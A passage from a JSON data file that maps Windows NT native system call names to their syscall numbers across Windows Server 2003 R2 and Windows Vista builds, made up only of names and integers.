"NtQueryIntervalProfile": 211, "NtQueryIoCompletion": 212, "NtQueryMultipleValueKey": 213, "NtQueryMutant": 214, "NtQueryOpenSubKeys": 215, "NtQueryOpenSubKeysEx": 216, "NtQueryPortInformationProcess": 217, "NtQueryQuotaInformationFile": 218, "NtQuerySecurityObject": 219, "NtQuerySemaphore": 220, "NtQuerySymbolicLinkObject": 221, "NtQuerySystemEnvironmentValue": 222, "NtQuerySystemEnvironmentValueEx": 223, "NtQueryTimerResolution": 224, "NtRaiseException": 225, "NtRaiseHardError": 226, "NtRegisterThreadTerminatePort": 227, "NtReleaseKeyedEvent": 228, "NtRemoveProcessDebug": 229, "NtRenameKey": 230, "NtReplaceKey": 231, "NtReplyWaitReplyPort": 232, "NtRequestDeviceWakeup": 233, "NtRequestPort": 234, "NtRequestWakeupLatency": 235, "NtResetEvent": 236, "NtResetWriteWatch": 237, "NtRestoreKey": 238, "NtResumeProcess": 239, "NtSaveKey": 240, "NtSaveKeyEx": 241, "NtSaveMergedKeys": 242, "NtSecureConnectPort": 243, "NtSetBootEntryOrder": 244, "NtSetBootOptions": 245, "NtSetContextThread": 246, "NtSetDebugFilterState": 247, "NtSetDefaultHardErrorPort": 248, "NtSetDefaultLocale": 249, "NtSetDefaultUILanguage": 250, "NtSetDriverEntryOrder": 251, "NtSetEaFile": 252, "NtSetHighEventPair": 253, "NtSetHighWaitLowEventPair": 254, "NtSetInformationDebugObject": 255, "NtSetInformationJobObject": 256, "NtSetInformationKey": 257, "NtSetInformationToken": 258, "NtSetIntervalProfile": 259, "NtSetIoCompletion": 260, "NtSetLdtEntries": 261, "NtSetLowEventPair": 262, "NtSetLowWaitHighEventPair": 263, "NtSetQuotaInformationFile": 264, "NtSetSecurityObject": 265, "NtSetSystemEnvironmentValue": 266, "NtSetSystemEnvironmentValueEx": 267, "NtSetSystemInformation": 268, "NtSetSystemPowerState": 269, "NtSetSystemTime": 270, "NtSetThreadExecutionState": 271, "NtSetTimerResolution": 272, "NtSetUuidSeed": 273, "NtSetVolumeInformationFile": 274, "NtShutdownSystem": 275, "NtSignalAndWaitForSingleObject": 276, "NtStartProfile": 277, "NtStopProfile": 278, "NtSuspendProcess": 279, "NtSuspendThread": 280, "NtSystemDebugControl": 281, "NtTerminateJobObject": 282, "NtTestAlert": 283, "NtTranslateFilePath": 284, "NtUnloadDriver": 285, "NtUnloadKey": 286, "NtUnloadKey2": 287, "NtUnloadKeyEx": 288, "NtUnlockFile": 289, "NtUnlockVirtualMemory": 290, "NtVdmControl": 291, "NtWaitForDebugEvent": 292, "NtWaitForKeyedEvent": 293, "NtWaitHighEventPair": 294, "NtWaitLowEventPair": 295}, "R2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateUserPhysicalPages": 108, "NtAllocateUuids": 109, "NtAreMappedFilesTheSame": 110, "NtAssignProcessToJobObject": 111, "NtCancelDeviceWakeupRequest": 112, "NtCompactKeys": 113, "NtCompareTokens": 114, "NtCompleteConnectPort": 115, "NtCompressKey": 116, "NtConnectPort": 117, "NtCreateDebugObject": 118, "NtCreateDirectoryObject": 119, "NtCreateEventPair": 120, "NtCreateIoCompletion": 121, "NtCreateJobObject": 122, "NtCreateJobSet": 123, "NtCreateKeyedEvent": 124, "NtCreateMailslotFile": 125, "NtCreateMutant": 126, "NtCreateNamedPipeFile": 127, "NtCreatePagingFile": 128, "NtCreatePort": 129, "NtCreateProcess": 130, "NtCreateProfile": 131, "NtCreateSemaphore": 132, "NtCreateSymbolicLinkObject": 133, "NtCreateTimer": 134, "NtCreateToken": 135, "NtCreateWaitablePort": 136, "NtDebugActiveProcess": 137, "NtDebugContinue": 138, "NtDeleteAtom": 139, "NtDeleteBootEntry": 140, "NtDeleteDriverEntry": 141, "NtDeleteFile": 142, "NtDeleteKey": 143, "NtDeleteObjectAuditAlarm": 144, "NtDeleteValueKey": 145, "NtDisplayString": 146, "NtEnumerateBootEntries": 147, "NtEnumerateDriverEntries": 148, "NtEnumerateSystemEnvironmentValuesEx": 149, "NtExtendSection": 150, "NtFilterToken": 151, "NtFlushInstructionCache": 152, "NtFlushKey": 153, "NtFlushVirtualMemory": 154, "NtFlushWriteBuffer": 155, "NtFreeUserPhysicalPages": 156, "NtGetContextThread": 157, "NtGetCurrentProcessorNumber": 158, "NtGetDevicePowerState": 159, "NtGetPlugPlayEvent": 160, "NtGetWriteWatch": 161, "NtImpersonateAnonymousToken": 162, "NtImpersonateThread": 163, "NtInitializeRegistry": 164, "NtInitiatePowerAction": 165, "NtIsSystemResumeAutomatic": 166, "NtListenPort": 167, "NtLoadDriver": 168, "NtLoadKey": 169, "NtLoadKey2": 170, "NtLoadKeyEx": 171, "NtLockFile": 172, "NtLockProductActivationKeys": 173, "NtLockRegistryKey": 174, "NtLockVirtualMemory": 175, "NtMakePermanentObject": 176, "NtMakeTemporaryObject": 177, "NtMapUserPhysicalPages": 178, "NtModifyBootEntry": 179, "NtModifyDriverEntry": 180, "NtNotifyChangeDirectoryFile": 181, "NtNotifyChangeKey": 182, "NtNotifyChangeMultipleKeys": 183, "NtOpenEventPair": 184, "NtOpenIoCompletion": 185, "NtOpenJobObject": 186, "NtOpenKeyedEvent": 187, "NtOpenMutant": 188, "NtOpenObjectAuditAlarm": 189, "NtOpenProcessToken": 190, "NtOpenSemaphore": 191, "NtOpenSymbolicLinkObject": 192, "NtOpenThread": 193, "NtOpenTimer": 194, "NtPlugPlayControl": 195, "NtPrivilegeCheck": 196, "NtPrivilegeObjectAuditAlarm": 197, "NtPrivilegedServiceAuditAlarm": 198, "NtPulseEvent": 199, "NtQueryBootEntryOrder": 200, "NtQueryBootOptions": 201, "NtQueryDebugFilterState": 202, "NtQueryDirectoryObject": 203, "NtQueryDriverEntryOrder": 204, "NtQueryEaFile": 205, "NtQueryFullAttributesFile": 206, "NtQueryInformationAtom": 207, "NtQueryInformationJobObject": 208, "NtQueryInformationPort": 209, "NtQueryInstallUILanguage": 210, "NtQueryIntervalProfile": 211, "NtQueryIoCompletion": 212, "NtQueryMultipleValueKey": 213, "NtQueryMutant": 214, "NtQueryOpenSubKeys": 215, "NtQueryOpenSubKeysEx": 216, "NtQueryPortInformationProcess": 217, "NtQueryQuotaInformationFile": 218, "NtQuerySecurityObject": 219, "NtQuerySemaphore": 220, "NtQuerySymbolicLinkObject": 221, "NtQuerySystemEnvironmentValue": 222, "NtQuerySystemEnvironmentValueEx": 223, "NtQueryTimerResolution": 224, "NtRaiseException": 225, "NtRaiseHardError": 226, "NtRegisterThreadTerminatePort": 227, "NtReleaseKeyedEvent": 228, "NtRemoveProcessDebug": 229, "NtRenameKey": 230, "NtReplaceKey": 231, "NtReplyWaitReplyPort": 232, "NtRequestDeviceWakeup": 233, "NtRequestPort": 234, "NtRequestWakeupLatency": 235, "NtResetEvent": 236, "NtResetWriteWatch": 237, "NtRestoreKey": 238, "NtResumeProcess": 239, "NtSaveKey": 240, "NtSaveKeyEx": 241, "NtSaveMergedKeys": 242, "NtSecureConnectPort": 243, "NtSetBootEntryOrder": 244, "NtSetBootOptions": 245, "NtSetContextThread": 246, "NtSetDebugFilterState": 247, "NtSetDefaultHardErrorPort": 248, "NtSetDefaultLocale": 249, "NtSetDefaultUILanguage": 250, "NtSetDriverEntryOrder": 251, "NtSetEaFile": 252, "NtSetHighEventPair": 253, "NtSetHighWaitLowEventPair": 254, "NtSetInformationDebugObject": 255, "NtSetInformationJobObject": 256, "NtSetInformationKey": 257, "NtSetInformationToken": 258, "NtSetIntervalProfile": 259, "NtSetIoCompletion": 260, "NtSetLdtEntries": 261, "NtSetLowEventPair": 262, "NtSetLowWaitHighEventPair": 263, "NtSetQuotaInformationFile": 264, "NtSetSecurityObject": 265, "NtSetSystemEnvironmentValue": 266, "NtSetSystemEnvironmentValueEx": 267, "NtSetSystemInformation": 268, "NtSetSystemPowerState": 269, "NtSetSystemTime": 270, "NtSetThreadExecutionState": 271, "NtSetTimerResolution": 272, "NtSetUuidSeed": 273, "NtSetVolumeInformationFile": 274, "NtShutdownSystem": 275, "NtSignalAndWaitForSingleObject": 276, "NtStartProfile": 277, "NtStopProfile": 278, "NtSuspendProcess": 279, "NtSuspendThread": 280, "NtSystemDebugControl": 281, "NtTerminateJobObject": 282, "NtTestAlert": 283, "NtTranslateFilePath": 284, "NtUnloadDriver": 285, "NtUnloadKey": 286, "NtUnloadKey2": 287, "NtUnloadKeyEx": 288, "NtUnlockFile": 289, "NtUnlockVirtualMemory": 290, "NtVdmControl": 291, "NtWaitForDebugEvent": 292, "NtWaitForKeyedEvent": 293, "NtWaitHighEventPair": 294, "NtWaitLowEventPair": 295}, "R2 SP2": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAddBootEntry": 102, "NtAddDriverEntry": 103, "NtAdjustGroupsToken": 104, "NtAlertResumeThread": 105, "NtAlertThread": 106, "NtAllocateLocallyUniqueId": 107, "NtAllocateUserPhysicalPages": 108, "NtAllocateUuids": 109, "NtAreMappedFilesTheSame": 110, "NtAssignProcessToJobObject": 111, "NtCancelDeviceWakeupRequest": 112, "NtCompactKeys": 113, "NtCompareTokens": 114, "NtCompleteConnectPort": 115, "NtCompressKey": 116, "NtConnectPort": 117, "NtCreateDebugObject": 118, "NtCreateDirectoryObject": 119, "NtCreateEventPair": 120, "NtCreateIoCompletion": 121, "NtCreateJobObject": 122, "NtCreateJobSet": 123, "NtCreateKeyedEvent": 124, "NtCreateMailslotFile": 125, "NtCreateMutant": 126, "NtCreateNamedPipeFile": 127, "NtCreatePagingFile": 128, "NtCreatePort": 129, "NtCreateProcess": 130, "NtCreateProfile": 131, "NtCreateSemaphore": 132, "NtCreateSymbolicLinkObject": 133, "NtCreateTimer": 134, "NtCreateToken": 135, "NtCreateWaitablePort": 136, "NtDebugActiveProcess": 137, "NtDebugContinue": 138, "NtDeleteAtom": 139, "NtDeleteBootEntry": 140, "NtDeleteDriverEntry": 141, "NtDeleteFile": 142, "NtDeleteKey": 143, "NtDeleteObjectAuditAlarm": 144, "NtDeleteValueKey": 145, "NtDisplayString": 146, "NtEnumerateBootEntries": 147, "NtEnumerateDriverEntries": 148, "NtEnumerateSystemEnvironmentValuesEx": 149, "NtExtendSection": 150, "NtFilterToken": 151, "NtFlushInstructionCache": 152, "NtFlushKey": 153, "NtFlushVirtualMemory": 154, "NtFlushWriteBuffer": 155, "NtFreeUserPhysicalPages": 156, "NtGetContextThread": 157, "NtGetCurrentProcessorNumber": 158, "NtGetDevicePowerState": 159, "NtGetPlugPlayEvent": 160, "NtGetWriteWatch": 161, "NtImpersonateAnonymousToken": 162, "NtImpersonateThread": 163, "NtInitializeRegistry": 164, "NtInitiatePowerAction": 165, "NtIsSystemResumeAutomatic": 166, "NtListenPort": 167, "NtLoadDriver": 168, "NtLoadKey": 169, "NtLoadKey2": 170, "NtLoadKeyEx": 171, "NtLockFile": 172, "NtLockProductActivationKeys": 173, "NtLockRegistryKey": 174, "NtLockVirtualMemory": 175, "NtMakePermanentObject": 176, "NtMakeTemporaryObject": 177, "NtMapUserPhysicalPages": 178, "NtModifyBootEntry": 179, "NtModifyDriverEntry": 180, "NtNotifyChangeDirectoryFile": 181, "NtNotifyChangeKey": 182, "NtNotifyChangeMultipleKeys": 183, "NtOpenEventPair": 184, "NtOpenIoCompletion": 185, "NtOpenJobObject": 186, "NtOpenKeyedEvent": 187, "NtOpenMutant": 188, "NtOpenObjectAuditAlarm": 189, "NtOpenProcessToken": 190, "NtOpenSemaphore": 191, "NtOpenSymbolicLinkObject": 192, "NtOpenThread": 193, "NtOpenTimer": 194, "NtPlugPlayControl": 195, "NtPrivilegeCheck": 196, "NtPrivilegeObjectAuditAlarm": 197, "NtPrivilegedServiceAuditAlarm": 198, "NtPulseEvent": 199, "NtQueryBootEntryOrder": 200, "NtQueryBootOptions": 201, "NtQueryDebugFilterState": 202, "NtQueryDirectoryObject": 203, "NtQueryDriverEntryOrder": 204, "NtQueryEaFile": 205, "NtQueryFullAttributesFile": 206, "NtQueryInformationAtom": 207, "NtQueryInformationJobObject": 208, "NtQueryInformationPort": 209, "NtQueryInstallUILanguage": 210, "NtQueryIntervalProfile": 211, "NtQueryIoCompletion": 212, "NtQueryMultipleValueKey": 213, "NtQueryMutant": 214, "NtQueryOpenSubKeys": 215, "NtQueryOpenSubKeysEx": 216, "NtQueryPortInformationProcess": 217, "NtQueryQuotaInformationFile": 218, "NtQuerySecurityObject": 219, "NtQuerySemaphore": 220, "NtQuerySymbolicLinkObject": 221, "NtQuerySystemEnvironmentValue": 222, "NtQuerySystemEnvironmentValueEx": 223, "NtQueryTimerResolution": 224, "NtRaiseException": 225, "NtRaiseHardError": 226, "NtRegisterThreadTerminatePort": 227, "NtReleaseKeyedEvent": 228, "NtRemoveProcessDebug": 229, "NtRenameKey": 230, "NtReplaceKey": 231, "NtReplyWaitReplyPort": 232, "NtRequestDeviceWakeup": 233, "NtRequestPort": 234, "NtRequestWakeupLatency": 235, "NtResetEvent": 236, "NtResetWriteWatch": 237, "NtRestoreKey": 238, "NtResumeProcess": 239, "NtSaveKey": 240, "NtSaveKeyEx": 241, "NtSaveMergedKeys": 242, "NtSecureConnectPort": 243, "NtSetBootEntryOrder": 244, "NtSetBootOptions": 245, "NtSetContextThread": 246, "NtSetDebugFilterState": 247, "NtSetDefaultHardErrorPort": 248, "NtSetDefaultLocale": 249, "NtSetDefaultUILanguage": 250, "NtSetDriverEntryOrder": 251, "NtSetEaFile": 252, "NtSetHighEventPair": 253, "NtSetHighWaitLowEventPair": 254, "NtSetInformationDebugObject": 255, "NtSetInformationJobObject": 256, "NtSetInformationKey": 257, "NtSetInformationToken": 258, "NtSetIntervalProfile": 259, "NtSetIoCompletion": 260, "NtSetLdtEntries": 261, "NtSetLowEventPair": 262, "NtSetLowWaitHighEventPair": 263, "NtSetQuotaInformationFile": 264, "NtSetSecurityObject": 265, "NtSetSystemEnvironmentValue": 266, "NtSetSystemEnvironmentValueEx": 267, "NtSetSystemInformation": 268, "NtSetSystemPowerState": 269, "NtSetSystemTime": 270, "NtSetThreadExecutionState": 271, "NtSetTimerResolution": 272, "NtSetUuidSeed": 273, "NtSetVolumeInformationFile": 274, "NtShutdownSystem": 275, "NtSignalAndWaitForSingleObject": 276, "NtStartProfile": 277, "NtStopProfile": 278, "NtSuspendProcess": 279, "NtSuspendThread": 280, "NtSystemDebugControl": 281, "NtTerminateJobObject": 282, "NtTestAlert": 283, "NtTranslateFilePath": 284, "NtUnloadDriver": 285, "NtUnloadKey": 286, "NtUnloadKey2": 287, "NtUnloadKeyEx": 288, "NtUnlockFile": 289, "NtUnlockVirtualMemory": 290, "NtVdmControl": 291, "NtWaitForDebugEvent": 292, "NtWaitForKeyedEvent": 293, "NtWaitHighEventPair": 294, "NtWaitLowEventPair": 295}}, "Windows Vista": {"SP0": {"NtMapUserPhysicalPagesScatter": 0, "NtWaitForSingleObject": 1, "NtCallbackReturn": 2, "NtReadFile": 3, "NtDeviceIoControlFile": 4, "NtWriteFile": 5, "NtRemoveIoCompletion": 6, "NtReleaseSemaphore": 7, "NtReplyWaitReceivePort": 8, "NtReplyPort": 9, "NtSetInformationThread": 10, "NtSetEvent": 11, "NtClose": 12, "NtQueryObject": 13, "NtQueryInformationFile": 14, "NtOpenKey": 15, "NtEnumerateValueKey": 16, "NtFindAtom": 17, "NtQueryDefaultLocale": 18, "NtQueryKey": 19, "NtQueryValueKey": 20, "NtAllocateVirtualMemory": 21, "NtQueryInformationProcess": 22, "NtWaitForMultipleObjects32": 23, "NtWriteFileGather": 24, "NtSetInformationProcess": 25, "NtCreateKey": 26, "NtFreeVirtualMemory": 27, "NtImpersonateClientOfPort": 28, "NtReleaseMutant": 29, "NtQueryInformationToken": 30, "NtRequestWaitReplyPort": 31, "NtQueryVirtualMemory": 32, "NtOpenThreadToken": 33, "NtQueryInformationThread": 34, "NtOpenProcess": 35, "NtSetInformationFile": 36, "NtMapViewOfSection": 37, "NtAccessCheckAndAuditAlarm": 38, "NtUnmapViewOfSection": 39, "NtReplyWaitReceivePortEx": 40, "NtTerminateProcess": 41, "NtSetEventBoostPriority": 42, "NtReadFileScatter": 43, "NtOpenThreadTokenEx": 44, "NtOpenProcessTokenEx": 45, "NtQueryPerformanceCounter": 46, "NtEnumerateKey": 47, "NtOpenFile": 48, "NtDelayExecution": 49, "NtQueryDirectoryFile": 50, "NtQuerySystemInformation": 51, "NtOpenSection": 52, "NtQueryTimer": 53, "NtFsControlFile": 54, "NtWriteVirtualMemory": 55, "NtCloseObjectAuditAlarm": 56, "NtDuplicateObject": 57, "NtQueryAttributesFile": 58, "NtClearEvent": 59, "NtReadVirtualMemory": 60, "NtOpenEvent": 61, "NtAdjustPrivilegesToken": 62, "NtDuplicateToken": 63, "NtContinue": 64, "NtQueryDefaultUILanguage": 65, "NtQueueApcThread": 66, "NtYieldExecution": 67, "NtAddAtom": 68, "NtCreateEvent": 69, "NtQueryVolumeInformationFile": 70, "NtCreateSection": 71, "NtFlushBuffersFile": 72, "NtApphelpCacheControl": 73, "NtCreateProcessEx": 74, "NtCreateThread": 75, "NtIsProcessInJob": 76, "NtProtectVirtualMemory": 77, "NtQuerySection": 78, "NtResumeThread": 79, "NtTerminateThread": 80, "NtReadRequestData": 81, "NtCreateFile": 82, "NtQueryEvent": 83, "NtWriteRequestData": 84, "NtOpenDirectoryObject": 85, "NtAccessCheckByTypeAndAuditAlarm": 86, "NtQuerySystemTime": 87, "NtWaitForMultipleObjects": 88, "NtSetInformationObject": 89, "NtCancelIoFile": 90, "NtTraceEvent": 91, "NtPowerInformation": 92, "NtSetValueKey": 93, "NtCancelTimer": 94, "NtSetTimer": 95, "NtAcceptConnectPort": 96, "NtAccessCheck": 97, "NtAccessCheckByType": 98, "NtAccessCheckByTypeResultList": 99, "NtAccessCheckByTypeResultListAndAuditAlarm": 100, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 101, "NtAcquireCMFViewOwnership": 102, "NtAddBootEntry": 103, "NtAddDriverEntry": 104, "NtAdjustGroupsToken": 105, "NtAlertResumeThread": 106, "NtAlertThread": 107, "NtAllocateLocallyUniqueId": 108, "NtAllocateUserPhysicalPages": 109, "NtAllocateUuids": 110, "NtAlpcAcceptConnectPort": 111, "NtAlpcCancelMessage": 112, "NtAlpcConnectPort": 113, "NtAlpcCreatePort": 114, "NtAlpcCreatePortSection": 115, "NtAlpcCreateResourceReserve": 116, "NtAlpcCreateSectionView": 117, "NtAlpcCreateSecurityContext": 118, "NtAlpcDeletePortSection": 119, "NtAlpcDeleteResourceReserve": 120, "NtAlpcDeleteSectionView": 121, "NtAlpcDeleteSecurityContext": 122, "NtAlpcDisconnectPort": 123, "NtAlpcImpersonateClientOfPort": 124, "NtAlpcOpenSenderProcess": 125, "NtAlpcOpenSenderThread": 126, "NtAlpcQueryInformation": 127, "NtAlpcQueryInformationMessage": 128, "NtAlpcRevokeSecurityContext": 129, "NtAlpcSendWaitReceivePort": 130, "NtAlpcSetInformation": 131, "NtAreMappedFilesTheSame": 132, "NtAssignProcessToJobObject": 133, "NtCancelDeviceWakeupRequest": 134, "NtCancelIoFileEx": 135, "NtCancelSynchronousIoFile": 136, "NtClearAllSavepointsTransaction": 137, "NtClearSavepointTransaction": 138, "NtCommitComplete": 139, "NtCommitEnlistment": 140, "NtCommitTransaction": 141, "NtCompactKeys": 142, "NtCompareTokens": 143, "NtCompleteConnectPort": 144, "NtCompressKey": 145, "NtConnectPort": 146, "NtCreateDebugObject": 147, "NtCreateDirectoryObject": 148, "NtCreateEnlistment": 149, "NtCreateEventPair": 150, "NtCreateIoCompletion": 151, "NtCreateJobObject": 152, "NtCreateJobSet": 153, "NtCreateKeyTransacted": 154, "NtCreateKeyedEvent": 155, "NtCreateMailslotFile": 156, "NtCreateMutant": 157, "NtCreateNamedPipeFile": 158, "NtCreatePagingFile": 159, "NtCreatePort": 160, "NtCreatePrivateNamespace": 161, "NtCreateProcess": 162, "NtCreateProfile": 163, "NtCreateResourceManager": 164, "NtCreateSemaphore": 165, "NtCreateSymbolicLinkObject": 166, "NtCreateThreadEx": 167, "NtCreateTimer": 168, "NtCreateToken": 169, "NtCreateTransaction": 170, "NtCreateTransactionManager": 171, "NtCreateUserProcess": 172, "NtCreateWaitablePort": 173, "NtCreateWorkerFactory": 174, "NtDebugActiveProcess": 175, "NtDebugContinue": 176, "NtDeleteAtom": 177, "NtDeleteBootEntry": 178, "NtDeleteDriverEntry": 179, "NtDeleteFile": 180, "NtDeleteKey": 181, "NtDeleteObjectAuditAlarm": 182, "NtDeletePrivateNamespace": 183, "NtDeleteValueKey": 184, "NtDisplayString": 185, "NtEnumerateBootEntries": 186, "NtEnumerateDriverEntries": 187, "NtEnumerateSystemEnvironmentValuesEx": 188, "NtEnumerateTransactionObject": 189, "NtExtendSection": 190, "NtFilterToken": 191, "NtFlushInstallUILanguage": 192, "NtFlushInstructionCache": 193, "NtFlushKey": 194, "NtFlushProcessWriteBuffers": 195, "NtFlushVirtualMemory": 196, "NtFlushWriteBuffer": 197, "NtFreeUserPhysicalPages": 198, "NtFreezeRegistry": 199, "NtFreezeTransactions": 200, "NtGetContextThread": 201, "NtGetCurrentProcessorNumber": 202, "NtGetDevicePowerState": 203, "NtGetMUIRegistryInfo": 204, "NtGetNextProcess": 205, "NtGetNextThread": 206, "NtGetNlsSectionPtr": 207, "NtGetNotificationResourceManager": 208, "NtGetPlugPlayEvent": 209, "NtGetWriteWatch": 210, "NtImpersonateAnonymousToken": 211, "NtImpersonateThread": 212, "NtInitializeNlsFiles": 213, "NtInitializeRegistry": 214, "NtInitiatePowerAction": 215, "NtIsSystemResumeAutomatic": 216, "NtIsUILanguageComitted": 217, "NtListTransactions": 218, "NtListenPort": 219, "NtLoadDriver": 220, "NtLoadKey": 221, "NtLoadKey2": 222, "NtLoadKeyEx": 223, "NtLockFile": 224, "NtLockProductActivationKeys": 225, "NtLockRegistryKey": 226, "NtLockVirtualMemory": 227, "NtMakePermanentObject": 228, "NtMakeTemporaryObject": 229, "NtMapCMFModule": 230, "NtMapUserPhysicalPages": 231, "NtMarshallTransaction": 232, "NtModifyBootEntry": 233, "NtModifyDriverEntry": 234, "NtNotifyChangeDirectoryFile": 235, "NtNotifyChangeKey": 236, "NtNotifyChangeMultipleKeys": 237, "NtOpenEnlistment": 238, "NtOpenEventPair": 239, "NtOpenIoCompletion": 240, "NtOpenJobObject": 241, "NtOpenKeyTransacted": 242, "NtOpenKeyedEvent": 243, "NtOpenMutant": 244, "NtOpenObjectAuditAlarm": 245, "NtOpenPrivateNamespace": 246, "NtOpenProcessToken": 247, "NtOpenResourceManager": 248, "NtOpenSemaphore": 249, "NtOpenSession": 250, "NtOpenSymbolicLinkObject": 251, "NtOpenThread": 252, "NtOpenTimer": 253, "NtOpenTransaction": 254, "NtOpenTransactionManager": 255, "NtPlugPlayControl": 256, "NtPrePrepareComplete": 257, "NtPrePrepareEnlistment": 258, "NtPrepareComplete": 259, "NtPrepareEnlistment": 260, "NtPrivilegeCheck": 261, "NtPrivilegeObjectAuditAlarm": 262, "NtPrivilegedServiceAuditAlarm": 263, "NtPropagationComplete": 264, "NtPropagationFailed": 265, "NtPullTransaction": 266, "NtPulseEvent": 267, "NtQueryBootEntryOrder": 268, "NtQueryBootOptions": 269, "NtQueryDebugFilterState": 270, "NtQueryDirectoryObject": 271, "NtQueryDriverEntryOrder": 272, "NtQueryEaFile": 273, 